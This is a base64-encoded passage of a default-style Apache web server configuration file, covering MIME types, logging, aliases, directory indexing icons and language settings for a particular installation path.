d3cvYXBhY2hlL2NvbmYvbWltZS50eXBlcwo8L0lmTW9kdWxlPgoKIwojIERlZmF1bHRUeXBlIGlz IHRoZSBkZWZhdWx0IE1JTUUgdHlwZSB0aGUgc2VydmVyIHdpbGwgdXNlIGZvciBhIGRvY3VtZW50 CiMgaWYgaXQgY2Fubm90IG90aGVyd2lzZSBkZXRlcm1pbmUgb25lLCBzdWNoIGFzIGZyb20gZmls ZW5hbWUgZXh0ZW5zaW9ucy4KIyBJZiB5b3VyIHNlcnZlciBjb250YWlucyBtb3N0bHkgdGV4dCBv ciBIVE1MIGRvY3VtZW50cywgInRleHQvcGxhaW4iIGlzCiMgYSBnb29kIHZhbHVlLiAgSWYgbW9z dCBvZiB5b3VyIGNvbnRlbnQgaXMgYmluYXJ5LCBzdWNoIGFzIGFwcGxpY2F0aW9ucwojIG9yIGlt YWdlcywgeW91IG1heSB3YW50IHRvIHVzZSAiYXBwbGljYXRpb24vb2N0ZXQtc3RyZWFtIiBpbnN0 ZWFkIHRvCiMga2VlcCBicm93c2VycyBmcm9tIHRyeWluZyB0byBkaXNwbGF5IGJpbmFyeSBmaWxl cyBhcyB0aG91Z2ggdGhleSBhcmUKIyB0ZXh0LgojCkRlZmF1bHRUeXBlIHRleHQvcGxhaW4KCiMK IyBUaGUgbW9kX21pbWVfbWFnaWMgbW9kdWxlIGFsbG93cyB0aGUgc2VydmVyIHRvIHVzZSB2YXJp b3VzIGhpbnRzIGZyb20gdGhlCiMgY29udGVudHMgb2YgdGhlIGZpbGUgaXRzZWxmIHRvIGRldGVy bWluZSBpdHMgdHlwZS4gIFRoZSBNSU1FTWFnaWNGaWxlCiMgZGlyZWN0aXZlIHRlbGxzIHRoZSBt b2R1bGUgd2hlcmUgdGhlIGhpbnQgZGVmaW5pdGlvbnMgYXJlIGxvY2F0ZWQuCiMgbW9kX21pbWVf bWFnaWMgaXMgbm90IHBhcnQgb2YgdGhlIGRlZmF1bHQgc2VydmVyICh5b3UgaGF2ZSB0byBhZGQK IyBpdCB5b3Vyc2VsZiB3aXRoIGEgTG9hZE1vZHVsZSBbc2VlIHRoZSBEU08gcGFyYWdyYXBoIGlu IHRoZSAnR2xvYmFsCiMgRW52aXJvbm1lbnQnIHNlY3Rpb25dLCBvciByZWNvbXBpbGUgdGhlIHNl cnZlciBhbmQgaW5jbHVkZSBtb2RfbWltZV9tYWdpYwojIGFzIHBhcnQgb2YgdGhlIGNvbmZpZ3Vy YXRpb24pLCBzbyBpdCdzIGVuY2xvc2VkIGluIGFuIDxJZk1vZHVsZT4gY29udGFpbmVyLgojIFRo aXMgbWVhbnMgdGhhdCB0aGUgTUlNRU1hZ2ljRmlsZSBkaXJlY3RpdmUgd2lsbCBvbmx5IGJlIHBy b2Nlc3NlZCBpZiB0aGUKIyBtb2R1bGUgaXMgcGFydCBvZiB0aGUgc2VydmVyLgojCjxJZk1vZHVs ZSBtb2RfbWltZV9tYWdpYy5jPgogICAgTUlNRU1hZ2ljRmlsZSAvdGV1ci9jcmUvYXBhZXUxMS93 d3cvYXBhY2hlL2NvbmYvbWFnaWMKPC9JZk1vZHVsZT4KCiMKIyBIb3N0bmFtZUxvb2t1cHM6IExv ZyB0aGUgbmFtZXMgb2YgY2xpZW50cyBvciBqdXN0IHRoZWlyIElQIGFkZHJlc3NlcwojIGUuZy4s IHd3dy5hcGFjaGUub3JnIChvbikgb3IgMjA0LjYyLjEyOS4xMzIgKG9mZikuCiMgVGhlIGRlZmF1 bHQgaXMgb2ZmIGJlY2F1c2UgaXQnZCBiZSBvdmVyYWxsIGJldHRlciBmb3IgdGhlIG5ldCBpZiBw ZW9wbGUKIyBoYWQgdG8ga25vd2luZ2x5IHR1cm4gdGhpcyBmZWF0dXJlIG9uLCBzaW5jZSBlbmFi bGluZyBpdCBtZWFucyB0aGF0CiMgZWFjaCBjbGllbnQgcmVxdWVzdCB3aWxsIHJlc3VsdCBpbiBB VCBMRUFTVCBvbmUgbG9va3VwIHJlcXVlc3QgdG8gdGhlCiMgbmFtZXNlcnZlci4KIwpIb3N0bmFt ZUxvb2t1cHMgT2ZmCgojCiMgRXJyb3JMb2c6IFRoZSBsb2NhdGlvbiBvZiB0aGUgZXJyb3IgbG9n IGZpbGUuCiMgSWYgeW91IGRvIG5vdCBzcGVjaWZ5IGFuIEVycm9yTG9nIGRpcmVjdGl2ZSB3aXRo aW4gYSA8VmlydHVhbEhvc3Q+CiMgY29udGFpbmVyLCBlcnJvciBtZXNzYWdlcyByZWxhdGluZyB0 byB0aGF0IHZpcnR1YWwgaG9zdCB3aWxsIGJlCiMgbG9nZ2VkIGhlcmUuICBJZiB5b3UgKmRvKiBk ZWZpbmUgYW4gZXJyb3IgbG9nZmlsZSBmb3IgYSA8VmlydHVhbEhvc3Q+CiMgY29udGFpbmVyLCB0 aGF0IGhvc3QncyBlcnJvcnMgd2lsbCBiZSBsb2dnZWQgdGhlcmUgYW5kIG5vdCBoZXJlLgojCkVy cm9yTG9nIC90ZXVyL2NyZS9hcGFldTExL3d3dy9hcGFjaGUvbG9ncy9lcnJvcl9sb2cKCiMKIyBM b2dMZXZlbDogQ29udHJvbCB0aGUgbnVtYmVyIG9mIG1lc3NhZ2VzIGxvZ2dlZCB0byB0aGUgZXJy b3JfbG9nLgojIFBvc3NpYmxlIHZhbHVlcyBpbmNsdWRlOiBkZWJ1ZywgaW5mbywgbm90aWNlLCB3 YXJuLCBlcnJvciwgY3JpdCwKIyBhbGVydCwgZW1lcmcuCiMKTG9nTGV2ZWwgZGVidWcKCiMKIyBU aGUgZm9sbG93aW5nIGRpcmVjdGl2ZXMgZGVmaW5lIHNvbWUgZm9ybWF0IG5pY2tuYW1lcyBmb3Ig dXNlIHdpdGgKIyBhIEN1c3RvbUxvZyBkaXJlY3RpdmUgKHNlZSBiZWxvdykuCiMKTG9nRm9ybWF0 ICIlaCAlbCAldSAldCBcIiVyXCIgJT5zICViIFwiJXtSZWZlcmVyfWlcIiBcIiV7VXNlci1BZ2Vu dH1pXCIiIGNvbWJpbmVkCkxvZ0Zvcm1hdCAiJWggJWwgJXUgJXQgXCIlclwiICU+cyAlYiIgY29t bW9uCkxvZ0Zvcm1hdCAiJXtSZWZlcmVyfWkgLT4gJVUiIHJlZmVyZXIKTG9nRm9ybWF0ICIle1Vz ZXItYWdlbnR9aSIgYWdlbnQKCiMKIyBUaGUgbG9jYXRpb24gYW5kIGZvcm1hdCBvZiB0aGUgYWNj ZXNzIGxvZ2ZpbGUgKENvbW1vbiBMb2dmaWxlIEZvcm1hdCkuCiMgSWYgeW91IGRvIG5vdCBkZWZp bmUgYW55IGFjY2VzcyBsb2dmaWxlcyB3aXRoaW4gYSA8VmlydHVhbEhvc3Q+CiMgY29udGFpbmVy LCB0aGV5IHdpbGwgYmUgbG9nZ2VkIGhlcmUuICBDb250cmFyaXdpc2UsIGlmIHlvdSAqZG8qCiMg ZGVmaW5lIHBlci08VmlydHVhbEhvc3Q+IGFjY2VzcyBsb2dmaWxlcywgdHJhbnNhY3Rpb25zIHdp bGwgYmUKIyBsb2dnZWQgdGhlcmVpbiBhbmQgKm5vdCogaW4gdGhpcyBmaWxlLgojCkN1c3RvbUxv ZyAvdGV1ci9jcmUvYXBhZXUxMS93d3cvYXBhY2hlL2xvZ3MvYWNjZXNzX2xvZyBjb21tb24KCiMK IyBJZiB5b3Ugd291bGQgbGlrZSB0byBoYXZlIGFnZW50IGFuZCByZWZlcmVyIGxvZ2ZpbGVzLCB1 bmNvbW1lbnQgdGhlCiMgZm9sbG93aW5nIGRpcmVjdGl2ZXMuCiMKI0N1c3RvbUxvZyAvdGV1ci9j cmUvYXBhZXUxMS93d3cvYXBhY2hlL2xvZ3MvcmVmZXJlcl9sb2cgcmVmZXJlcgojQ3VzdG9tTG9n IC90ZXVyL2NyZS9hcGFldTExL3d3dy9hcGFjaGUvbG9ncy9hZ2VudF9sb2cgYWdlbnQKCiMKIyBJ ZiB5b3UgcHJlZmVyIGEgc2luZ2xlIGxvZ2ZpbGUgd2l0aCBhY2Nlc3MsIGFnZW50LCBhbmQgcmVm ZXJlciBpbmZvcm1hdGlvbgojIChDb21iaW5lZCBMb2dmaWxlIEZvcm1hdCkgeW91IGNhbiB1c2Ug dGhlIGZvbGxvd2luZyBkaXJlY3RpdmUuCiMKI0N1c3RvbUxvZyAvdGV1ci9jcmUvYXBhZXUxMS93 d3cvYXBhY2hlL2xvZ3MvYWNjZXNzX2xvZyBjb21iaW5lZAoKIwojIE9wdGlvbmFsbHkgYWRkIGEg bGluZSBjb250YWluaW5nIHRoZSBzZXJ2ZXIgdmVyc2lvbiBhbmQgdmlydHVhbCBob3N0CiMgbmFt ZSB0byBzZXJ2ZXItZ2VuZXJhdGVkIHBhZ2VzIChlcnJvciBkb2N1bWVudHMsIEZUUCBkaXJlY3Rv cnkgbGlzdGluZ3MsCiMgbW9kX3N0YXR1cyBhbmQgbW9kX2luZm8gb3V0cHV0IGV0Yy4sIGJ1dCBu b3QgQ0dJIGdlbmVyYXRlZCBkb2N1bWVudHMpLgojIFNldCB0byAiRU1haWwiIHRvIGFsc28gaW5j bHVkZSBhIG1haWx0bzogbGluayB0byB0aGUgU2VydmVyQWRtaW4uCiMgU2V0IHRvIG9uZSBvZjog IE9uIHwgT2ZmIHwgRU1haWwKIwpTZXJ2ZXJTaWduYXR1cmUgT24KCiMgRUJDRElDIGNvbmZpZ3Vy YXRpb246CiMgKG9ubHkgZm9yIG1haW5mcmFtZXMgdXNpbmcgdGhlIEVCQ0RJQyBjb2Rlc2V0LCBj dXJyZW50bHkgb25lIG9mOgojIEZ1aml0c3UtU2llbWVucycgQlMyMDAwL09TRCwgSUJNJ3MgT1Mv MzkwIGFuZCBJQk0ncyBUUEYpISEKIyBUaGUgZm9sbG93aW5nIGRlZmF1bHQgY29uZmlndXJhdGlv biBhc3N1bWVzIHRoYXQgInRleHQgZmlsZXMiCiMgYXJlIHN0b3JlZCBpbiBFQkNESUMgKHNvIHRo YXQgeW91IGNhbiBvcGVyYXRlIG9uIHRoZW0gdXNpbmcgdGhlCiMgbm9ybWFsIFBPU0lYIHRvb2xz IGxpa2UgZ3JlcCBhbmQgc29ydCkgd2hpbGUgImJpbmFyeSBmaWxlcyIgYXJlCiMgc3RvcmVkIHdp dGggaWRlbnRpY2FsIG9jdGV0cyBhcyBvbiBhbiBBU0NJSSBtYWNoaW5lLgojCiMgVGhlIGRpcmVj dGl2ZXMgYXJlIGV2YWx1YXRlZCBpbiBjb25maWd1cmF0aW9uIGZpbGUgb3JkZXIsIHdpdGgKIyB0 aGUgRUJDRElDQ29udmVydCBkaXJlY3RpdmVzIGFwcGxpZWQgYmVmb3JlIEVCQ0RJQ0NvbnZlcnRC eVR5cGUuCiMKIyBJZiB5b3Ugd2FudCB0byBoYXZlIEFTQ0lJIEhUTUwgZG9jdW1lbnRzIGFuZCBF QkNESUMgSFRNTCBkb2N1bWVudHMKIyBhdCB0aGUgc2FtZSB0aW1lLCB5b3UgY2FuIHVzZSB0aGUg ZmlsZSBleHRlbnNpb24gdG8gZm9yY2UKIyBjb252ZXJzaW9uIG9mZiBmb3IgdGhlIEFTQ0lJIGRv Y3VtZW50czoKIyA+IEFkZFR5cGUgICAgICAgdGV4dC9odG1sIC5haHRtbAojID4gRUJDRElDQ29u dmVydCBPZmY9SW5PdXQgLmFodG1sCiMKIyBFQkNESUNDb252ZXJ0QnlUeXBlICBPbj1Jbk91dCB0 ZXh0LyogbWVzc2FnZS8qIG11bHRpcGFydC8qCiMgRUJDRElDQ29udmVydEJ5VHlwZSAgT249SW4g ICAgYXBwbGljYXRpb24veC13d3ctZm9ybS11cmxlbmNvZGVkCiMgRUJDRElDQ29udmVydEJ5VHlw ZSAgT249SW5PdXQgYXBwbGljYXRpb24vcG9zdHNjcmlwdCBtb2RlbC92cm1sCiMgRUJDRElDQ29u dmVydEJ5VHlwZSBPZmY9SW5PdXQgKi8qCgoKIwojIEFsaWFzZXM6IEFkZCBoZXJlIGFzIG1hbnkg YWxpYXNlcyBhcyB5b3UgbmVlZCAod2l0aCBubyBsaW1pdCkuIFRoZSBmb3JtYXQgaXMgCiMgQWxp YXMgZmFrZW5hbWUgcmVhbG5hbWUKIwo8SWZNb2R1bGUgbW9kX2FsaWFzLmM+CgogICAgIwogICAg IyBOb3RlIHRoYXQgaWYgeW91IGluY2x1ZGUgYSB0cmFpbGluZyAvIG9uIGZha2VuYW1lIHRoZW4g dGhlIHNlcnZlciB3aWxsCiAgICAjIHJlcXVpcmUgaXQgdG8gYmUgcHJlc2VudCBpbiB0aGUgVVJM LiAgU28gIi9pY29ucyIgaXNuJ3QgYWxpYXNlZCBpbiB0aGlzCiAgICAjIGV4YW1wbGUsIG9ubHkg Ii9pY29ucy8iLiAgSWYgdGhlIGZha2VuYW1lIGlzIHNsYXNoLXRlcm1pbmF0ZWQsIHRoZW4gdGhl IAogICAgIyByZWFsbmFtZSBtdXN0IGFsc28gYmUgc2xhc2ggdGVybWluYXRlZCwgYW5kIGlmIHRo ZSBmYWtlbmFtZSBvbWl0cyB0aGUgCiAgICAjIHRyYWlsaW5nIHNsYXNoLCB0aGUgcmVhbG5hbWUg bXVzdCBhbHNvIG9taXQgaXQuCiAgICAjCiAgICBBbGlhcyAvaWNvbnMvICIvdGV1ci9jcmUvYXBh ZXUxMS93d3cvYXBhY2hlL2ljb25zLyIKCiAgICA8RGlyZWN0b3J5ICIvdGV1ci9jcmUvYXBhZXUx MS93d3cvYXBhY2hlL2ljb25zIj4KICAgICAgICBPcHRpb25zIEluZGV4ZXMgTXVsdGlWaWV3cwog ICAgICAgIEFsbG93T3ZlcnJpZGUgTm9uZQogICAgICAgIE9yZGVyIGFsbG93LGRlbnkKICAgICAg ICBBbGxvdyBmcm9tIGFsbAogICAgPC9EaXJlY3Rvcnk+CgogICAgIyBUaGlzIEFsaWFzIHdpbGwg cHJvamVjdCB0aGUgb24tbGluZSBkb2N1bWVudGF0aW9uIHRyZWUgdW5kZXIgL21hbnVhbC8KICAg ICMgZXZlbiBpZiB5b3UgY2hhbmdlIHRoZSBEb2N1bWVudFJvb3QuIENvbW1lbnQgaXQgaWYgeW91 IGRvbid0IHdhbnQgdG8gCiAgICAjIHByb3ZpZGUgYWNjZXNzIHRvIHRoZSBvbi1saW5lIGRvY3Vt ZW50YXRpb24uCiAgICAjCiAgICBBbGlhcyAvZG9jLyAiL3RldXIvY3JlL2FwYWV1MTEvd3d3L2Fw YWNoZS9odGRvY3MvIgoKICAgIDxEaXJlY3RvcnkgIi90ZXVyL2NyZS9hcGFldTExL3d3dy9hcGFj aGUvaHRkb2NzIj4KICAgICAgICBPcHRpb25zIEluZGV4ZXMgRm9sbG93U3ltbGlua3MgTXVsdGlW aWV3cwogICAgICAgIEFsbG93T3ZlcnJpZGUgTm9uZQogICAgICAgIE9yZGVyIGFsbG93LGRlbnkK ICAgICAgICBBbGxvdyBmcm9tIGFsbAogICAgPC9EaXJlY3Rvcnk+CgogICAgIwogICAgIyBTY3Jp cHRBbGlhczogVGhpcyBjb250cm9scyB3aGljaCBkaXJlY3RvcmllcyBjb250YWluIHNlcnZlciBz Y3JpcHRzLgogICAgIyBTY3JpcHRBbGlhc2VzIGFyZSBlc3NlbnRpYWxseSB0aGUgc2FtZSBhcyBB bGlhc2VzLCBleGNlcHQgdGhhdAogICAgIyBkb2N1bWVudHMgaW4gdGhlIHJlYWxuYW1lIGRpcmVj dG9yeSBhcmUgdHJlYXRlZCBhcyBhcHBsaWNhdGlvbnMgYW5kCiAgICAjIHJ1biBieSB0aGUgc2Vy dmVyIHdoZW4gcmVxdWVzdGVkIHJhdGhlciB0aGFuIGFzIGRvY3VtZW50cyBzZW50IHRvIHRoZSBj bGllbnQuCiAgICAjIFRoZSBzYW1lIHJ1bGVzIGFib3V0IHRyYWlsaW5nICIvIiBhcHBseSB0byBT Y3JpcHRBbGlhcyBkaXJlY3RpdmVzIGFzIHRvCiAgICAjIEFsaWFzLgogICAgIwogICAgU2NyaXB0 QWxpYXMgL2NnaS1iaW4vICIvdGV1ci9jcmUvYXBhZXUxMS93d3cvYXBhY2hlL2NnaS1iaW4vIgoK ICAgICMKICAgICMgIi90ZXVyL2NyZS9hcGFldTExL3d3dy9hcGFjaGUvY2dpLWJpbiIgc2hvdWxk IGJlIGNoYW5nZWQgdG8gd2hhdGV2ZXIgeW91ciBTY3JpcHRBbGlhc2VkCiAgICAjIENHSSBkaXJl Y3RvcnkgZXhpc3RzLCBpZiB5b3UgaGF2ZSB0aGF0IGNvbmZpZ3VyZWQuCiAgICAjCiAgICA8RGly ZWN0b3J5ICIvdGV1ci9jcmUvYXBhZXUxMS93d3cvYXBhY2hlL2NnaS1iaW4iPgogICAgICAgIEFs bG93T3ZlcnJpZGUgTm9uZQogICAgICAgIE9wdGlvbnMgTm9uZQogICAgICAgIE9yZGVyIGFsbG93 LGRlbnkKICAgICAgICBBbGxvdyBmcm9tIGFsbAogICAgPC9EaXJlY3Rvcnk+Cgo8L0lmTW9kdWxl PgojIEVuZCBvZiBhbGlhc2VzLgoKIwojIFJlZGlyZWN0IGFsbG93cyB5b3UgdG8gdGVsbCBjbGll bnRzIGFib3V0IGRvY3VtZW50cyB3aGljaCB1c2VkIHRvIGV4aXN0IGluCiMgeW91ciBzZXJ2ZXIn cyBuYW1lc3BhY2UsIGJ1dCBkbyBub3QgYW55bW9yZS4gVGhpcyBhbGxvd3MgeW91IHRvIHRlbGwg dGhlCiMgY2xpZW50cyB3aGVyZSB0byBsb29rIGZvciB0aGUgcmVsb2NhdGVkIGRvY3VtZW50Lgoj IEZvcm1hdDogUmVkaXJlY3Qgb2xkLVVSSSBuZXctVVJMCiMKCiMKIyBEaXJlY3RpdmVzIGNvbnRy b2xsaW5nIHRoZSBkaXNwbGF5IG9mIHNlcnZlci1nZW5lcmF0ZWQgZGlyZWN0b3J5IGxpc3Rpbmdz LgojCjxJZk1vZHVsZSBtb2RfYXV0b2luZGV4LmM+CgogICAgIwogICAgIyBGYW5jeUluZGV4aW5n IGlzIHdoZXRoZXIgeW91IHdhbnQgZmFuY3kgZGlyZWN0b3J5IGluZGV4aW5nIG9yIHN0YW5kYXJk CiAgICAjCiAgICBJbmRleE9wdGlvbnMgRmFuY3lJbmRleGluZwoKICAgICMKICAgICMgQWRkSWNv biogZGlyZWN0aXZlcyB0ZWxsIHRoZSBzZXJ2ZXIgd2hpY2ggaWNvbiB0byBzaG93IGZvciBkaWZm ZXJlbnQKICAgICMgZmlsZXMgb3IgZmlsZW5hbWUgZXh0ZW5zaW9ucy4gIFRoZXNlIGFyZSBvbmx5 IGRpc3BsYXllZCBmb3IKICAgICMgRmFuY3lJbmRleGVkIGRpcmVjdG9yaWVzLgogICAgIwogICAg QWRkSWNvbkJ5RW5jb2RpbmcgKENNUCwvaWNvbnMvY29tcHJlc3NlZC5naWYpIHgtY29tcHJlc3Mg eC1nemlwCgogICAgQWRkSWNvbkJ5VHlwZSAoVFhULC9pY29ucy90ZXh0LmdpZikgdGV4dC8qCiAg ICBBZGRJY29uQnlUeXBlIChJTUcsL2ljb25zL2ltYWdlMi5naWYpIGltYWdlLyoKICAgIEFkZElj b25CeVR5cGUgKFNORCwvaWNvbnMvc291bmQyLmdpZikgYXVkaW8vKgogICAgQWRkSWNvbkJ5VHlw ZSAoVklELC9pY29ucy9tb3ZpZS5naWYpIHZpZGVvLyoKCiAgICBBZGRJY29uIC9pY29ucy9iaW5h cnkuZ2lmIC5iaW4gLmV4ZQogICAgQWRkSWNvbiAvaWNvbnMvYmluaGV4LmdpZiAuaHF4CiAgICBB ZGRJY29uIC9pY29ucy90YXIuZ2lmIC50YXIKICAgIEFkZEljb24gL2ljb25zL3dvcmxkMi5naWYg LndybCAud3JsLmd6IC52cm1sIC52cm0gLml2CiAgICBBZGRJY29uIC9pY29ucy9jb21wcmVzc2Vk LmdpZiAuWiAueiAudGd6IC5neiAuemlwCiAgICBBZGRJY29uIC9pY29ucy9hLmdpZiAucHMgLmFp IC5lcHMKICAgIEFkZEljb24gL2ljb25zL2xheW91dC5naWYgLmh0bWwgLnNodG1sIC5odG0gLnBk ZgogICAgQWRkSWNvbiAvaWNvbnMvdGV4dC5naWYgLnR4dAogICAgQWRkSWNvbiAvaWNvbnMvYy5n aWYgLmMKICAgIEFkZEljb24gL2ljb25zL3AuZ2lmIC5wbCAucHkKICAgIEFkZEljb24gL2ljb25z L2YuZ2lmIC5mb3IKICAgIEFkZEljb24gL2ljb25zL2R2aS5naWYgLmR2aQogICAgQWRkSWNvbiAv aWNvbnMvdXVlbmNvZGVkLmdpZiAudXUKICAgIEFkZEljb24gL2ljb25zL3NjcmlwdC5naWYgLmNv bmYgLnNoIC5zaGFyIC5jc2ggLmtzaCAudGNsCiAgICBBZGRJY29uIC9pY29ucy90ZXguZ2lmIC50 ZXgKICAgIEFkZEljb24gL2ljb25zL2JvbWIuZ2lmIGNvcmUKCiAgICBBZGRJY29uIC9pY29ucy9i YWNrLmdpZiAuLgogICAgQWRkSWNvbiAvaWNvbnMvaGFuZC5yaWdodC5naWYgUkVBRE1FCiAgICBB ZGRJY29uIC9pY29ucy9mb2xkZXIuZ2lmIF5eRElSRUNUT1JZXl4KICAgIEFkZEljb24gL2ljb25z L2JsYW5rLmdpZiBeXkJMQU5LSUNPTl5eCgogICAgIwogICAgIyBEZWZhdWx0SWNvbiBpcyB3aGlj aCBpY29uIHRvIHNob3cgZm9yIGZpbGVzIHdoaWNoIGRvIG5vdCBoYXZlIGFuIGljb24KICAgICMg ZXhwbGljaXRseSBzZXQuCiAgICAjCiAgICBEZWZhdWx0SWNvbiAvaWNvbnMvdW5rbm93bi5naWYK CiAgICAjCiAgICAjIEFkZERlc2NyaXB0aW9uIGFsbG93cyB5b3UgdG8gcGxhY2UgYSBzaG9ydCBk ZXNjcmlwdGlvbiBhZnRlciBhIGZpbGUgaW4KICAgICMgc2VydmVyLWdlbmVyYXRlZCBpbmRleGVz LiAgVGhlc2UgYXJlIG9ubHkgZGlzcGxheWVkIGZvciBGYW5jeUluZGV4ZWQKICAgICMgZGlyZWN0 b3JpZXMuCiAgICAjIEZvcm1hdDogQWRkRGVzY3JpcHRpb24gImRlc2NyaXB0aW9uIiBmaWxlbmFt ZQogICAgIwogICAgI0FkZERlc2NyaXB0aW9uICJHWklQIGNvbXByZXNzZWQgZG9jdW1lbnQiIC5n egogICAgI0FkZERlc2NyaXB0aW9uICJ0YXIgYXJjaGl2ZSIgLnRhcgogICAgI0FkZERlc2NyaXB0 aW9uICJHWklQIGNvbXByZXNzZWQgdGFyIGFyY2hpdmUiIC50Z3oKCiAgICAjCiAgICAjIFJlYWRt ZU5hbWUgaXMgdGhlIG5hbWUgb2YgdGhlIFJFQURNRSBmaWxlIHRoZSBzZXJ2ZXIgd2lsbCBsb29r IGZvciBieQogICAgIyBkZWZhdWx0LCBhbmQgYXBwZW5kIHRvIGRpcmVjdG9yeSBsaXN0aW5ncy4K ICAgICMKICAgICMgSGVhZGVyTmFtZSBpcyB0aGUgbmFtZSBvZiBhIGZpbGUgd2hpY2ggc2hvdWxk IGJlIHByZXBlbmRlZCB0bwogICAgIyBkaXJlY3RvcnkgaW5kZXhlcy4gCiAgICAjCiAgICAjIElm IE11bHRpVmlld3MgYXJlIGFtb25nc3QgdGhlIE9wdGlvbnMgaW4gZWZmZWN0LCB0aGUgc2VydmVy IHdpbGwKICAgICMgZmlyc3QgbG9vayBmb3IgbmFtZS5odG1sIGFuZCBpbmNsdWRlIGl0IGlmIGZv dW5kLiAgSWYgbmFtZS5odG1sCiAgICAjIGRvZXNuJ3QgZXhpc3QsIHRoZSBzZXJ2ZXIgd2lsbCB0 aGVuIGxvb2sgZm9yIG5hbWUudHh0IGFuZCBpbmNsdWRlCiAgICAjIGl0IGFzIHBsYWludGV4dCBp ZiBmb3VuZC4KICAgICMKICAgIFJlYWRtZU5hbWUgUkVBRE1FCiAgICBIZWFkZXJOYW1lIEhFQURF UgoKICAgICMKICAgICMgSW5kZXhJZ25vcmUgaXMgYSBzZXQgb2YgZmlsZW5hbWVzIHdoaWNoIGRp cmVjdG9yeSBpbmRleGluZyBzaG91bGQgaWdub3JlCiAgICAjIGFuZCBub3QgaW5jbHVkZSBpbiB0 aGUgbGlzdGluZy4gIFNoZWxsLXN0eWxlIHdpbGRjYXJkaW5nIGlzIHBlcm1pdHRlZC4KICAgICMK ICAgIEluZGV4SWdub3JlIC4/PyogKn4gKiMgSEVBREVSKiBSRUFETUUqIFJDUyBDVlMgKix2ICos dAoKPC9JZk1vZHVsZT4KIyBFbmQgb2YgaW5kZXhpbmcgZGlyZWN0aXZlcy4KCiMKIyBEb2N1bWVu dCB0eXBlcy4KIwo8SWZNb2R1bGUgbW9kX21pbWUuYz4KCiAgICAjCiAgICAjIEFkZEVuY29kaW5n IGFsbG93cyB5b3UgdG8gaGF2ZSBjZXJ0YWluIGJyb3dzZXJzIChNb3NhaWMvWCAyLjErKSB1bmNv bXByZXNzCiAgICAjIGluZm9ybWF0aW9uIG9uIHRoZSBmbHkuIE5vdGU6IE5vdCBhbGwgYnJvd3Nl cnMgc3VwcG9ydCB0aGlzLgogICAgIyBEZXNwaXRlIHRoZSBuYW1lIHNpbWlsYXJpdHksIHRoZSBm b2xsb3dpbmcgQWRkKiBkaXJlY3RpdmVzIGhhdmUgbm90aGluZwogICAgIyB0byBkbyB3aXRoIHRo ZSBGYW5jeUluZGV4aW5nIGN1c3RvbWl6YXRpb24gZGlyZWN0aXZlcyBhYm92ZS4KICAgICMKICAg IEFkZEVuY29kaW5nIHgtY29tcHJlc3MgWgogICAgQWRkRW5jb2RpbmcgeC1nemlwIGd6IHRnegoK ICAgICMKICAgICMgQWRkTGFuZ3VhZ2UgYWxsb3dzIHlvdSB0byBzcGVjaWZ5IHRoZSBsYW5ndWFn ZSBvZiBhIGRvY3VtZW50LiBZb3UgY2FuCiAgICAjIHRoZW4gdXNlIGNvbnRlbnQgbmVnb3RpYXRp b24gdG8gZ2l2ZSBhIGJyb3dzZXIgYSBmaWxlIGluIGEgbGFuZ3VhZ2UKICAgICMgaXQgY2FuIHVu ZGVyc3RhbmQuICAKICAgICMKICAgICMgTm90ZSAxOiBUaGUgc3VmZml4IGRvZXMgbm90IGhhdmUg dG8gYmUgdGhlIHNhbWUgYXMgdGhlIGxhbmd1YWdlIAogICAgIyBrZXl3b3JkIC0tLSB0aG9zZSB3 aXRoIGRvY3VtZW50cyBpbiBQb2xpc2ggKHdob3NlIG5ldC1zdGFuZGFyZCAKICAgICMgbGFuZ3Vh Z2UgY29kZSBpcyBwbCkgbWF5IHdpc2ggdG8gdXNlICJBZGRMYW5ndWFnZSBwbCAucG8iIHRvIAog ICAgIyBhdm9pZCB0aGUgYW1iaWd1aXR5IHdpdGggdGhlIGNvbW1vbiBzdWZmaXggZm9yIHBlcmwg c2NyaXB0cy4KICAgICMKICAgICMgTm90ZSAyOiBUaGUgZXhhbXBsZSBlbnRyaWVzIGJlbG93IGls bHVzdHJhdGUgdGhhdCBpbiBxdWl0ZQogICAgIyBzb21lIGNhc2VzIHRoZSB0d28gY2hhcmFjdGVy ICdMYW5ndWFnZScgYWJicmV2aWF0aW9uIGlzIG5vdAogICAgIyBpZGVudGljYWwgdG8gdGhlIHR3 byBjaGFyYWN0ZXIgJ0NvdW50cnknIGNvZGUgZm9yIGl0cyBjb3VudHJ5LAogICAgIyBFLmcuICdE YW5tYXJrL2RrJyB2ZXJzdXMgJ0RhbmlzaC9kYScuCiAgICAjCiAgICAjIE5vdGUgMzogSW4gdGhl IGNhc2Ugb2YgJ2x0eicgd2UgdmlvbGF0ZSB0aGUgUkZDIGJ5IHVzaW5nIGEgdGhyZWUgY2hhciAK ICAgICMgc3BlY2lmaWVyLiBCdXQgdGhlcmUgaXMgJ3dvcmsgaW4gcHJvZ3Jlc3MnIHRvIGZpeCB0 aGlzIGFuZCBnZXQgCiAgICAjIHRoZSByZWZlcmVuY2UgZGF0YSBmb3IgcmZjMTc2NiBjbGVhbmVk IHVwLgogICAgIwogICAgIyBEYW5pc2ggKGRhKSAtIER1dGNoIChubCkgLSBFbmdsaXNoIChlbikg LSBFc3RvbmlhbiAoZWUpCiAgICAjIEZyZW5jaCAoZnIpIC0gR2VybWFuIChkZSkgLSBHcmVlay1N b2Rlcm4gKGVsKQogICAgIyBJdGFsaWFuIChpdCkgLSBLb3JlYW4gKGtyKSAtIE5vcndlZ2lhbiAo bm8pIC0gTm9yd2VnaWFuIE55bm9yc2sgKG5uKQogICAgIyBQb3J0dWdlc2UgKHB0KSAtIEx1eGVt Ym91cmdlb2lzKiAobHR6KQogICAgIyBTcGFuaXNoIChlcykgLSBTd2VkaXNoIChzdikgLSBDYXRh bGFuIChjYSkgLSBDemVjaChjeikKICAgICMgUG9saXNoIChwbCkgLSBCcmF6aWxpYW4gUG9ydHVn dWVzZSAocHQtYnIpIC0gSmFwYW5lc2UgKGphKQogICAgIyBSdXNzaWFuIChydSkKICAgICMKICAg IEFkZExhbmd1YWdlIGRhIC5kawogICAgQWRkTGFuZ3VhZ2UgbmwgLm5sCiAgICBBZGRMYW5ndWFn ZSBlbiAuZW4KICAgIEFkZExhbmd1YWdlIGV0IC5lZQogICAgQWRkTGFuZ3VhZ2UgZnIgLmZyCiAg ICBBZGRMYW5ndWFnZSBkZSAuZGUKICAgIEFkZExhbmd1YWdlIGVsIC5lbAogICAgQWRkTGFuZ3Vh Z2UgaGUgLmhlCiAgICBBZGRDaGFyc2V0IElTTy04ODU5LTggLmlzbzg4NTktOAogICAgQWRkTGFu 